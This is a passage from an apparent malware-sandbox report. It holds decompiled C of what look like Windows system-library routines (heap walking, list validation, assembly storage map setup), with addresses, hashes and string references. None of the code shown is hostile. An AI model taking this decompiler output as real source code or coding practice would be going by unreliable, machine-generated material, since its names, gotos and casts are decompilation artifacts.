				_t74 = __edx;
				if(__edx != 0 && ( *(__edx + 8) & 0x00000004) == 0) {
					_t82 = __ecx + 4;
					_t72 =  *_t82;
					while(_t72 != _t82) {
						_t83 = _t72 - 8;
						_t79 = 1;
						if( *_t83 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t82;
							_v60 = _t83;
							_v92 = 0xc0150015;
							_v88 = 1;
							L0183DEF0(_t74, 1);
							_t74 = _v96;
							_t79 = 1;
						}
						if( *(_t83 + 0x14) !=  !( *(_t83 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t79;
							_v68 = 2;
							_v64 = _t82;
							_v60 = _t83;
							_v92 = 0xc0150015;
							_v88 = _t79;
							L0183DEF0(_t74, _t79);
							_t74 = _v96;
						}
						_t9 = _t83 + 0x18; // 0x1c
						_t54 = _t9;
						if(_t74 < _t9) {
							L13:
							_t72 =  *_t72;
							continue;
						} else {
							_t10 = _t83 + 0x618; // 0x61c
							_t54 = _t10;
							if(_t74 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t64 = _t74 - _t83 - 0x18;
								asm("cdq");
								_t79 = _t64 % _v96;
								_t54 = 0x18 + _t64 / _v96 * 0x30 + _t83;
								if(_t74 == 0x18 + _t64 / _v96 * 0x30 + _t83) {
									_t54 =  *(_t83 + 4);
									if(_t54 != 0) {
										_t68 = _t54 - 1;
										 *(_t83 + 4) = _t68;
										_t54 =  !_t68;
										 *(_t83 + 0x14) =  !_t68;
										 *((intOrPtr*)(_t74 + 8)) = 4;
										if( *(_t83 + 4) == 0) {
											_t54 =  *(_t72 + 4);
											if(_t54 != _t82) {
												do {
													_t83 =  *(_t54 + 4);
													_t79 = _t54 - 8;
													if( *((intOrPtr*)(_t54 - 8 + 4)) == 0) {
														_t77 =  *_t54;
														if( *(_t77 + 4) != _t54 ||  *_t83 != _t54) {
															_push(3);
															asm("int 0x29");
															return 0x3e5;
														}
														 *_t83 = _t77;
														 *(_t77 + 4) = _t83;
														L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t79);
													}
													_t54 = _t83;
												} while (_t83 != _t82);
											}
										}
									}
								}
							}
						}
						goto L12;
					}
				}
				L12:
				return E0182B640(_t54, _t72, _v8 ^ _t84, _t79, _t82, _t83);
			}
























                                                        0x017e4439
                                                        0x017e4446
                                                        0x017e4448
                                                        0x017e444e
                                                        0x017e4450
                                                        0x017e4453
                                                        0x017e4457
                                                        0x017e4467
                                                        0x017e446a
                                                        0x017e446c
                                                        0x017e4472
                                                        0x017e4475
                                                        0x017e447c
                                                        0x0184080d
                                                        0x01840814
                                                        0x01840815
                                                        0x0184081c
                                                        0x0184081f
                                                        0x01840822
                                                        0x01840825
                                                        0x01840828
                                                        0x0184082f
                                                        0x01840832
                                                        0x01840837
                                                        0x0184083c
                                                        0x0184083c
                                                        0x017e448a
                                                        0x01840842
                                                        0x01840849
                                                        0x0184084a
                                                        0x01840851
                                                        0x01840854
                                                        0x0184085b
                                                        0x0184085e
                                                        0x01840861
                                                        0x01840868
                                                        0x0184086b
                                                        0x01840870
                                                        0x01840870
                                                        0x017e4490
                                                        0x017e4490
                                                        0x017e4495
                                                        0x017e44f8
                                                        0x017e44f8
                                                        0x00000000
                                                        0x017e4497
                                                        0x017e4497
                                                        0x017e4497
                                                        0x017e449f
                                                        0x00000000
                                                        0x017e44a1
                                                        0x017e44a3
                                                        0x017e44ac
                                                        0x017e44af
                                                        0x017e44b0
                                                        0x017e44b9
                                                        0x017e44bd
                                                        0x017e44bf
                                                        0x017e44c4
                                                        0x017e44c6
                                                        0x017e44c7
                                                        0x017e44ca
                                                        0x017e44cc
                                                        0x017e44cf
                                                        0x017e44da
                                                        0x017e44dc
                                                        0x017e44e1
                                                        0x01840878
                                                        0x01840878
                                                        0x0184087b
                                                        0x01840882
                                                        0x01840884
                                                        0x01840889
                                                        0x018408b0
                                                        0x018408b3
                                                        0x00000000
                                                        0x018408b5
                                                        0x01840896
                                                        0x0184089a
                                                        0x018408a0
                                                        0x018408a0
                                                        0x018408a5
                                                        0x018408a7
                                                        0x018408ab
                                                        0x017e44e1
                                                        0x017e44da
                                                        0x017e44c4
                                                        0x017e44bd
                                                        0x017e449f
                                                        0x00000000
                                                        0x017e4495
                                                        0x017e446c
                                                        0x017e44e7
                                                        0x017e44f7

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$Flst
                                                        • API String ID: 0-758220159
                                                        • Opcode ID: 1ec8cb7e0d46fc927c2705a15869cb22629b1e0a47ed0b71f04b600fec6b9df4
                                                        • Instruction ID: 71fea0c09c7f08cfa2a2f76ef12190887e4d39530011e67872d6ebeb70e85374
                                                        • Opcode Fuzzy Hash: 1ec8cb7e0d46fc927c2705a15869cb22629b1e0a47ed0b71f04b600fec6b9df4
                                                        • Instruction Fuzzy Hash: 46416AB1A00648CFDB25CF99C9847ADFBF5EF88314F14802AE14ADF645DB319A45CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181D4B0 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E0181D4B0(signed int* __ecx, signed int __edx, void* _a4) {
				signed int _v8;
				void* _t17;
				signed int* _t26;
				signed int _t29;
				void* _t34;
				signed int _t41;

				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t26 = __ecx;
				_t41 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_push(_t41);
					_push(_t26);
					E01875720(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Map        : 0x%p\nSXS:    EntryCount : 0x%lx\n", "RtlpInitializeAssemblyStorageMap");
					_t17 = 0xc000000d;
				} else {
					_t34 = _a4;
					if(_t34 == 0) {
						_t29 = 4;
						_t17 = E0181F3D5( &_v8, __edx * _t29, __edx * _t29 >> 0x20);
						if(_t17 >= 0) {
							_t34 = E01804620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
							if(_t34 != 0) {
								_v8 = 1;
								goto L3;
							} else {
								_t17 = 0xc0000017;
							}
						}
					} else {
						L3:
						if(_t41 != 0) {
							memset(_t34, 0, _t41 << 2);
						}
						 *_t26 = _v8;
						_t17 = 0;
						_t26[1] = _t41;
						_t26[2] = _t34;
					}
				}
				return _t17;
			}









                                                        0x0181d4b5
                                                        0x0181d4b6
                                                        0x0181d4b7
                                                        0x0181d4bd
                                                        0x0181d4bf
                                                        0x0181d4c4
                                                        0x0185b0b0
                                                        0x0185b0b1
                                                        0x0185b0c0
                                                        0x0185b0c8
                                                        0x0181d4d2
                                                        0x0181d4d2
                                                        0x0181d4d7
                                                        0x0185b06a
                                                        0x0185b074
                                                        0x0185b07b
                                                        0x0185b094
                                                        0x0185b098
                                                        0x0185b0a4
                                                        0x00000000
                                                        0x0185b09a
                                                        0x0185b09a
                                                        0x0185b09a
                                                        0x0185b098
                                                        0x0181d4dd
                                                        0x0181d4dd
                                                        0x0181d4df
                                                        0x0181d4e7
                                                        0x0181d4e7
                                                        0x0181d4ec
                                                        0x0181d4ee
                                                        0x0181d4f0
                                                        0x0181d4f3
                                                        0x0181d4f3
                                                        0x0181d4d7
                                                        0x0181d4fc

                                                        Strings
                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0185B0B7
                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 0185B0B2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                        • API String ID: 0-2653619699
                                                        • Opcode ID: 82bfd79a3951ca53c49dc7cf61f0ab8c7dd112eb0cccf616bd49d05190ced161
                                                        • Instruction ID: 721901203d94214abddd9fa224ec70d407023d69ca53824bb3ee3efd53be01c6
                                                        • Opcode Fuzzy Hash: 82bfd79a3951ca53c49dc7cf61f0ab8c7dd112eb0cccf616bd49d05190ced161
                                                        • Instruction Fuzzy Hash: 4E112972B40208BBF7248E9D8D81FABB6ADDB94B14F148169BF04DB244E671DF00C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0188EB8A Relevance: 1.8, Strings: 1, Instructions: 599COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E0188EB8A(signed int __ecx, signed int __edx, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				signed char _t262;
				signed int _t263;
				char* _t264;
				signed int _t265;
				intOrPtr _t267;
				signed int _t271;
				signed char _t272;
				signed short _t273;
				signed int _t277;
				signed char _t281;
				signed short _t283;
				signed short _t288;
				signed char _t289;
				signed short _t290;
				signed short _t292;
				signed short _t294;
				signed char _t295;
				intOrPtr _t296;
				signed int _t297;
				signed char _t298;
				unsigned int _t302;
				intOrPtr* _t303;
				signed int _t304;
				unsigned int _t306;
				signed short _t307;
				signed short _t308;
				signed int _t311;
				signed short _t314;
				signed short _t326;
				signed char _t329;
				signed short _t330;
				signed int _t332;
				void* _t333;
				signed short _t337;
				signed int _t339;
				void* _t340;
				signed short _t344;
				signed int _t347;
				signed int _t349;
				signed int _t351;
				signed int _t359;
				signed short _t362;
				signed int _t369;
				signed int _t376;
				signed short _t377;
				signed short* _t378;
				signed short _t381;
				signed char _t383;
				signed short _t384;
				signed short _t385;
				signed int _t390;
				signed int _t393;
				void* _t400;
				signed short _t406;
				signed int _t407;
				signed short _t408;
				signed short _t409;
				signed short _t410;
				signed short _t411;
				intOrPtr _t415;
				signed int _t416;
				signed char _t417;
				signed int _t418;
				unsigned int _t423;
				unsigned int _t431;
				signed int _t437;
				signed int _t442;
				intOrPtr _t443;
				void* _t449;
				intOrPtr _t451;
				signed short _t453;
				signed int _t455;

				_t258 =  *0x18dd360 ^ _t455;
				_v8 = _t258;
				_t452 = __ecx;
				_t395 = __edx;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x61000000;
					asm("bt dword [edi+0x40], 0x1c");
					__eflags = (_t258 & 0xffffff00 | ( *(__ecx + 0x40) & 0x61000000) >= 0x00000000) & (__ecx & 0xffffff00 | __eflags != 0x00000000);
					if(__eflags == 0) {
						L5:
						_v12 = _v12 & 0x00000000;
						_t260 =  *_t395;
						_push(2);
						__eflags = _t260;
						if(_t260 != 0) {
							_t399 =  *(_t395 + 0xa) & 0x0000ffff;
							__eflags = _t399 & 0x00001002;
							if((_t399 & 0x00001002) == 0) {
								goto L25;
							}
							_t441 = _t399 & 0x00000002;
							__eflags = _t441;
							if(_t441 == 0) {
								L14:
								__eflags = _a4;
								if(_a4 == 0) {
									L17:
									_t453 =  *(_t395 + 4) + _t260;
									__eflags = _t399 & 0x00001000;
									if((_t399 & 0x00001000) != 0) {
										_t441 = _t260 - 0x18;
										_t399 = _t452;
										_t260 = E0188D42F(_t452, _t260 - 0x18);
									}
									__eflags = _a4;
									if(_a4 == 0) {
										L21:
										_t451 =  *((intOrPtr*)(_t260 + 0x10));
										_t399 = 2;
										__eflags = _t451 - _t452 + 0xa4;
										if(_t451 == _t452 + 0xa4) {
											__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t399;
											if( *((intOrPtr*)(_t452 + 0xda)) != _t399) {
												goto L62;
											}
											_t441 =  *(_t452 + 0xd4);
											goto L63;
										}
										_t441 = _t451 + 0xfffffff0;
										goto L63;
									} else {
										__eflags = _t453 -  *((intOrPtr*)(_t260 + 0x28));
										if(_t453 <  *((intOrPtr*)(_t260 + 0x28))) {
											goto L82;
										}
										goto L21;
									}
								}
								__eflags = _t441;
								if(_t441 == 0) {
									goto L17;
								}
								_t453 =  *(_t260 + 0x24);
								goto L82;
							} else {
								__eflags =  *((char*)(_t452 + 0xda)) - 2;
								if( *((char*)(_t452 + 0xda)) != 2) {
									_t437 = 0;
									__eflags = 0;
								} else {
									_t437 =  *(_t452 + 0xd4);
								}
								__eflags = _t260 - _t437;
								if(_t260 == _t437) {
									goto L61;
								} else {
									_t399 =  *(_t395 + 0xa) & 0x0000ffff;
									goto L14;
								}
							}
						} else {
							_t441 = _t452;
							L63:
							_t453 = 0;
							__eflags = _t441;
							if(_t441 != 0) {
								__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t399;
								if( *((intOrPtr*)(_t452 + 0xda)) != _t399) {
									_t359 = 0;
									__eflags = 0;
								} else {
									_t359 =  *(_t452 + 0xd4);
								}
								__eflags = _t441 - _t359;
								if(_t441 == _t359) {
									_t441 = _t395;
									E018A6D15(_t452, _t395,  &_v12);
									goto L193;
								} else {
									 *_t395 = _t441;
									__eflags =  *(_t452 + 0x4c) - _t453;
									if( *(_t452 + 0x4c) == _t453) {
										_t362 =  *_t441 & 0x0000ffff;
									} else {
										_t377 =  *_t441;
										__eflags =  *(_t452 + 0x4c) & _t377;
										if(( *(_t452 + 0x4c) & _t377) != 0) {
											_t377 = _t377 ^  *(_t452 + 0x50);
											__eflags = _t377;
										}
										_t362 = _t377 & 0x0000ffff;
									}
									 *(_t395 + 4) = (_t362 & 0x0000ffff) << 3;
									 *(_t395 + 0xa) = _t399;
									 *(_t395 + 8) = _t453;
									 *(_t395 + 0xc) =  *((intOrPtr*)(_t441 + 0x20)) -  *(_t441 + 0x2c) << 0xc;
									_t369 =  *(_t441 + 0x2c) << 0xc;
									 *(_t395 + 0x10) = _t369;
									__eflags =  *(_t441 + 0xc) & _t399;
									if(( *(_t441 + 0xc) & _t399) != 0) {
										_t376 = _t369 + 0x1000;
										__eflags = _t376;
										 *(_t395 + 0x10) = _t376;
									}
									 *(_t395 + 0x14) =  *((intOrPtr*)(_t441 + 0x24)) + (( !( *( *((intOrPtr*)(_t441 + 0x24)) + 2)) & 0x00000001) + 1) * 8;
									 *((intOrPtr*)(_t395 + 0x18)) =  *((intOrPtr*)(_t441 + 0x28));
									L82:
									__eflags = _t453;
									if(_t453 == 0) {
										L193:
										_t263 = E01807D50();
										__eflags = _t263;
										if(_t263 == 0) {
											_t264 = 0x7ffe0380;
										} else {
											_t264 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t264;
										if( *_t264 != 0) {
											_t267 =  *[fs:0x30];
											__eflags =  *(_t267 + 0x240) & 0x00000001;
											if(( *(_t267 + 0x240) & 0x00000001) != 0) {
												__eflags = _v12 - 0x8000001a;
												if(_v12 != 0x8000001a) {
													E018A1BA8(_t452);
												}
											}
										}
										_t265 = _v12;
										goto L201;
									}
									_t272 =  *((intOrPtr*)(_t453 + 7));
									__eflags = _t272 & 0x00000040;
									if((_t272 & 0x00000040) == 0) {
										__eflags = _t272 - 4;
										if(_t272 != 4) {
											_t273 = _t453;
											L89:
											 *_t395 = _t273 + 8;
											_t441 = 2;
											 *(_t395 + 0xa) = 1;
											__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t441;
											if( *((intOrPtr*)(_t452 + 0xda)) != _t441) {
												_t277 = 0;
												__eflags = 0;
											} else {
												_t277 =  *(_t452 + 0xd4);
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L97:
												_t281 =  *(_t452 + 0x4c) >> 0x00000014 &  *(_t452 + 0x52) ^  *(_t453 + 2);
												__eflags = _t281 & 0x00000001;
												if((_t281 & 0x00000001) == 0) {
													 *_t395 = _t453 + 0x10;
													__eflags =  *(_t452 + 0x4c);
													if( *(_t452 + 0x4c) == 0) {
														_t283 =  *_t453 & 0x0000ffff;
													} else {
														_t288 =  *_t453;
														__eflags =  *(_t452 + 0x4c) & _t288;
														if(( *(_t452 + 0x4c) & _t288) != 0) {
															_t288 = _t288 ^  *(_t452 + 0x50);
															__eflags = _t288;
														}
														_t283 = _t288 & 0x0000ffff;
													}
													 *(_t395 + 4) = (_t283 & 0x0000ffff) * 8 - 0x10;
													 *((char*)(_t395 + 9)) =  *(_t453 + 6);
													 *(_t395 + 0xa) = 0;
													 *(_t395 + 8) = 0x10;
													 *(_t395 + 0x14) = 0x10;
													goto L193;
												}
												_t289 =  *((intOrPtr*)(_t453 + 7));
												__eflags = _t289 & 0x00000040;
												if((_t289 & 0x00000040) == 0) {
													__eflags = _t289 - 4;
													if(_t289 != 4) {
														_t290 = _t453;
														L104:
														 *_t395 = _t290 + 8;
														_t399 =  *((intOrPtr*)(_t453 + 7));
														__eflags = _t399 - 4;
														if(_t399 == 4) {
															__eflags =  *(_t452 + 0x4c);
															if( *(_t452 + 0x4c) == 0) {
																_t292 =  *_t453 & 0x0000ffff;
															} else {
																_t308 =  *_t453;
																__eflags =  *(_t452 + 0x4c) & _t308;
																if(( *(_t452 + 0x4c) & _t308) != 0) {
																	_t308 = _t308 ^  *(_t452 + 0x50);
																	__eflags = _t308;
																}
																_t292 = _t308 & 0x0000ffff;
															}
															 *((char*)(_t395 + 9)) = 0x40;
															_t294 = 0x4001;
															 *(_t395 + 4) =  *((intOrPtr*)(_t453 - 8)) - (_t292 & 0x0000ffff);
															 *(_t395 + 0xa) = 0x4001;
															__eflags =  *(_t452 + 0x4c);
															if( *(_t452 + 0x4c) == 0) {
																_t406 =  *_t453 & 0x0000ffff;
															} else {
																_t307 =  *_t453;
																__eflags =  *(_t452 + 0x4c) & _t307;
																if(( *(_t452 + 0x4c) & _t307) != 0) {
																	_t307 = _t307 ^  *(_t452 + 0x50);
																	__eflags = _t307;
																}
																_t406 = _t307 & 0x0000ffff;
																_t294 =  *(_t395 + 0xa) & 0x0000ffff;
															}
															_t407 = _t406 & 0x0000ffff;
															 *(_t395 + 8) = _t407;
															__eflags = _t441 & _t294;
															if((_t441 & _t294) == 0) {
																 *(_t395 + 0x14) = _t407;
															}
															_t408 = _t294 & 0x0000ffff;
															L166:
															__eflags =  *(_t452 + 0x4c);
															if( *(_t452 + 0x4c) == 0) {
																_t295 =  *(_t453 + 2);
																_t409 = _t408 & 0x0000ffff;
															} else {
																_t306 =  *_t453;
																__eflags =  *(_t452 + 0x4c) & _t306;
																if(( *(_t452 + 0x4c) & _t306) != 0) {
																	_t306 = _t306 ^  *(_t452 + 0x50);
																	__eflags = _t306;
																}
																_t409 =  *(_t395 + 0xa) & 0x0000ffff;
																_t295 = _t306 >> 0x10;
															}
															__eflags = _t441 & _t295;
															if((_t441 & _t295) == 0) {
																_t296 =  *[fs:0x30];
																_t410 = _t409 & 0x0000ffff;
																__eflags =  *(_t296 + 0x68) & 0x00000800;
																if(( *(_t296 + 0x68) & 0x00000800) != 0) {
																	_t297 =  *(_t453 + 3) & 0x000000ff;
																} else {
																	_t297 = 0;
																}
																 *(_t395 + 0x10) = _t297;
															} else {
																_t441 = _t453;
																_t303 = E0188D380(_t452, _t453);
																 *(_t395 + 0xc) =  *(_t303 + 4);
																 *((short*)(_t395 + 0x12)) =  *_t303;
																_t415 =  *[fs:0x30];
																__eflags =  *(_t415 + 0x68) & 0x00000800;
																if(( *(_t415 + 0x68) & 0x00000800) != 0) {
																	_t304 =  *(_t303 + 2) & 0x0000ffff;
																} else {
																	_t304 = 0;
																}
																 *(_t395 + 0x10) = _t304;
																 *(_t395 + 0xa) =  *(_t395 + 0xa) | 0x00000010;
																_t410 =  *(_t395 + 0xa) & 0x0000ffff;
															}
															__eflags =  *(_t452 + 0x4c);
															if( *(_t452 + 0x4c) == 0) {
																_t298 =  *(_t453 + 2);
																_t411 = _t410 & 0x0000ffff;
															} else {
																_t302 =  *_t453;
																__eflags =  *(_t452 + 0x4c) & _t302;
																if(( *(_t452 + 0x4c) & _t302) != 0) {
																	_t302 = _t302 ^  *(_t452 + 0x50);
																	__eflags = _t302;
																}
																_t411 =  *(_t395 + 0xa) & 0x0000ffff;
																_t298 = _t302 >> 0x10;
															}
															 *(_t395 + 0xa) = _t298 & 0xe0 | _t411;
															goto L193;
														}
														__eflags = _t399 - 3;
														if(_t399 == 3) {
															_t408 = 0x1000;
															 *_t395 =  *(_t453 + 0x18);
															 *(_t395 + 0x14) =  *(_t395 + 0x14) & 0x00000000;
															 *(_t395 + 4) =  *(_t453 + 0x1c);
															 *(_t395 + 8) = 0x10000000;
															goto L166;
														}
														__eflags = _t399 - 1;
														if(_t399 != 1) {
															_t442 =  *(_t452 + 0x4c);
															__eflags = _t442;
															if(_t442 == 0) {
																_t311 =  *_t453 & 0x0000ffff;
															} else {
																_t344 =  *_t453;
																_t442 =  *(_t452 + 0x4c);
																__eflags = _t344 & _t442;
																if((_t344 & _t442) != 0) {
																	_t344 = _t344 ^  *(_t452 + 0x50);
																	__eflags = _t344;
																}
																_t399 =  *((intOrPtr*)(_t453 + 7));
																_t311 = _t344 & 0x0000ffff;
															}
															_v20 = _t311;
															__eflags = _t399 - 5;
															if(_t399 != 5) {
																__eflags = _t399 & 0x00000040;
																if((_t399 & 0x00000040) == 0) {
																	__eflags = (_t399 & 0x0000003f) - 0x3f;
																	if((_t399 & 0x0000003f) == 0x3f) {
																		__eflags = _t399;
																		if(_t399 >= 0) {
																			__eflags = _t442;
																			if(_t442 == 0) {
																				_t314 =  *_t453 & 0x0000ffff;
																			} else {
																				_t337 =  *_t453;
																				__eflags =  *(_t452 + 0x4c) & _t337;
																				if(( *(_t452 + 0x4c) & _t337) != 0) {
																					_t337 = _t337 ^  *(_t452 + 0x50);
																					__eflags = _t337;
																				}
																				_t314 = _t337 & 0x0000ffff;
																			}
																		} else {
																			_t431 = _t453 >> 0x00000003 ^  *_t453 ^  *0x18d874c ^ _t452;
																			__eflags = _t431;
																			if(_t431 == 0) {
																				_t339 = _t453 - (_t431 >> 0xd);
																				__eflags = _t339;
																				_t340 =  *_t339;
																			} else {
																				_t340 = 0;
																			}
																			_t314 =  *((intOrPtr*)(_t340 + 0x14));
																		}
																		_t416 =  *(_t453 + (_t314 & 0xffff) * 8 - 4);
																	} else {
																		_t416 = _t399 & 0x3f;
																	}
																} else {
																	_t416 =  *(_t453 + 4 + (_t399 & 0x3f) * 8) & 0x0000ffff;
																}
															} else {
																_t416 =  *(_t452 + 0x54) & 0x0000ffff ^  *(_t453 + 4) & 0x0000ffff;
															}
															 *(_t395 + 4) = ((_v20 & 0x0000ffff) << 3) - _t416;
															 *((char*)(_t395 + 9)) =  *(_t453 + 6);
															 *(_t395 + 0xa) = 1;
															_t417 =  *((intOrPtr*)(_t453 + 7));
															__eflags = _t417 - 5;
															if(_t417 != 5) {
																__eflags = _t417 & 0x00000040;
																if((_t417 & 0x00000040) == 0) {
																	__eflags = (_t417 & 0x0000003f) - 0x3f;
																	if((_t417 & 0x0000003f) == 0x3f) {
																		__eflags = _t417;
																		if(_t417 >= 0) {
																			__eflags =  *(_t452 + 0x4c);
																			if( *(_t452 + 0x4c) == 0) {
																				_t326 =  *_t453 & 0x0000ffff;
																			} else {
																				_t330 =  *_t453;
																				__eflags =  *(_t452 + 0x4c) & _t330;
																				if(( *(_t452 + 0x4c) & _t330) != 0) {
																					_t330 = _t330 ^  *(_t452 + 0x50);
																					__eflags = _t330;
																				}
																				_t326 = _t330 & 0x0000ffff;
																			}
																		} else {
																			_t423 = _t453 >> 0x00000003 ^  *_t453 ^  *0x18d874c ^ _t452;
																			__eflags = _t423;
																			if(_t423 == 0) {
																				_t332 = _t453 - (_t423 >> 0xd);
																				__eflags = _t332;
																				_t333 =  *_t332;
																			} else {
																				_t333 = 0;
																			}
																			_t326 =  *((intOrPtr*)(_t333 + 0x14));
																		}
																		_t418 =  *(_t453 + (_t326 & 0xffff) * 8 - 4);
																	} else {
																		_t418 = _t417 & 0x3f;
																	}
																} else {
																	_t418 =  *(_t453 + 4 + (_t417 & 0x3f) * 8) & 0x0000ffff;
																}
															} else {
																_t418 =  *(_t452 + 0x54) & 0x0000ffff ^  *(_t453 + 4) & 0x0000ffff;
															}
															_t329 =  *(_t395 + 0xa) & 0x0000ffff;
															_t441 = 2;
															 *(_t395 + 8) = _t418;
															__eflags = _t441 & _t329;
															if((_t441 & _t329) == 0) {
																 *(_t395 + 0x14) = _t418;
															}
															_t408 = _t329;
															goto L166;
														}
														 *(_t395 + 0xa) = 1;
														goto L26;
													}
													_t347 =  *(_t453 + 6) & 0x000000ff;
													L100:
													_t290 = _t453 + _t347 * 8;
													goto L104;
												}
												_t347 = _t289 & 0x3f;
												__eflags = _t347;
												goto L100;
											} else {
												_t441 = _t395;
												_t399 = _t452;
												_t349 = E018A67E2(_t452, _t395, _t452);
												__eflags = _t349;
												if(_t349 == 0) {
													_t441 = 2;
													goto L97;
												}
												__eflags =  *(_t395 + 0xa) & 0x00002000;
												if(( *(_t395 + 0xa) & 0x00002000) == 0) {
													goto L193;
												}
												L25:
												_t441 = 2;
												L26:
												__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t441;
												if( *((intOrPtr*)(_t452 + 0xda)) != _t441) {
													_t261 = 0;
													__eflags = 0;
												} else {
													_t261 =  *(_t452 + 0xd4);
												}
												__eflags = _t261;
												if(_t261 == 0) {
													L32:
													__eflags =  *(_t395 + 0xa) & 0x00000001;
													_t400 =  *_t395;
													if(( *(_t395 + 0xa) & 0x00000001) == 0) {
														_t399 = _t400 + 0xfffffff0;
														__eflags =  *(_t452 + 0x4c);
														if( *(_t452 + 0x4c) == 0) {
															_t453 =  *_t399 & 0x0000ffff;
														} else {
															_t381 =  *_t399;
															__eflags =  *(_t452 + 0x4c) & _t381;
															if(( *(_t452 + 0x4c) & _t381) != 0) {
																_t381 = _t381 ^  *(_t452 + 0x50);
																__eflags = _t381;
															}
															_t453 = _t381 & 0x0000ffff;
														}
														_t262 =  *(_t399 + 6);
														__eflags = _t262;
														if(_t262 == 0) {
															_t441 = _t452;
														} else {
															_t441 = (_t399 & 0xffff0000) - ((_t262 & 0x000000ff) << 0x10) + 0x10000;
														}
														__eflags = _t441;
														if(_t441 == 0) {
															L192:
															_v12 = 0xc0000141;
															goto L193;
														} else {
															__eflags =  *((char*)(_t399 + 7)) - 3;
															if( *((char*)(_t399 + 7)) != 3) {
																_t271 = _t453 & 0x0000ffff;
																L81:
																_t453 = _t399 + _t271 * 8;
																goto L82;
															}
															L58:
															__eflags =  *(_t399 + 0x1c) + 0x20 + _t399 -  *((intOrPtr*)(_t441 + 0x28));
															if( *(_t399 + 0x1c) + 0x20 + _t399 <  *((intOrPtr*)(_t441 + 0x28))) {
																 *_t395 =  *(_t399 + 0x18);
																 *(_t395 + 0x14) =  *(_t395 + 0x14) & 0x00000000;
																_t453 = 0;
																 *(_t395 + 4) =  *(_t399 + 0x1c);
																 *(_t395 + 8) = 0x10000000;
																goto L82;
															}
															_t443 =  *((intOrPtr*)(_t441 + 0x10));
															__eflags = _t443 - _t452 + 0xa4;
															if(_t443 == _t452 + 0xa4) {
																L61:
																_t399 = 2;
																L62:
																_t441 = 0;
																__eflags = 0;
																goto L63;
															}
															_t441 = _t443 + 0xfffffff0;
															_t399 = 2;
															goto L63;
														}
													}
													_t399 = _t400 + 0xfffffff8;
													__eflags =  *((char*)(_t399 + 7)) - 5;
													if( *((char*)(_t399 + 7)) == 5) {
														_t399 = _t399 - (( *(_t399 + 6) & 0x000000ff) << 3);
														__eflags = _t399;
													}
													__eflags =  *((intOrPtr*)(_t399 + 7)) - 4;
													if( *((intOrPtr*)(_t399 + 7)) != 4) {
														_t383 =  *(_t399 + 6);
														__eflags = _t383;
														if(_t383 == 0) {
															_t441 = _t452;
														} else {
															_t449 = (_t399 & 0xffff0000) - ((_t383 & 0x000000ff) << 0x10);
															_t383 =  *((intOrPtr*)(_t399 + 7));
															_t441 = _t449 + 0x10000;
														}
														__eflags = _t441;
														if(_t441 == 0) {
															goto L192;
														} else {
															__eflags = _t383 - 3;
															if(_t383 == 3) {
																goto L58;
															}
															__eflags =  *(_t452 + 0x4c);
															if( *(_t452 + 0x4c) == 0) {
																_t384 =  *_t399 & 0x0000ffff;
															} else {
																_t385 =  *_t399;
																__eflags =  *(_t452 + 0x4c) & _t385;
																if(( *(_t452 + 0x4c) & _t385) != 0) {
																	_t385 = _t385 ^  *(_t452 + 0x50);
																	__eflags = _t385;
																}
																_t384 = _t385 & 0x0000ffff;
															}
															_t271 = _t384 & 0x0000ffff;
															goto L81;
														}
													} else {
														_t453 =  *(_t399 - 0x18);
														_t378 = _t452 + 0x9c;
														L65:
														__eflags = _t453 - _t378;
														if(_t453 == _t378) {
															_v12 = 0x8000001a;
															goto L193;
														}
														_t453 = _t453 + 0x18;
														goto L82;
													}
												} else {
													_t441 = _t395;
													_t390 = E018A67E2(_t452, _t395, _t399);
													__eflags = _t390;
													if(_t390 == 0) {
														goto L32;
													}
													__eflags =  *(_t395 + 0xa) & 0x00002000;
													if(( *(_t395 + 0xa) & 0x00002000) == 0) {
														goto L193;
													}
													goto L32;
												}
											}
										}
										_t351 =  *(_t453 + 6) & 0x000000ff;
										L85:
										_t273 = _t453 + _t351 * 8;
										goto L89;
									}
									_t351 = _t272 & 0x3f;
									__eflags = _t351;
									goto L85;
								}
							}
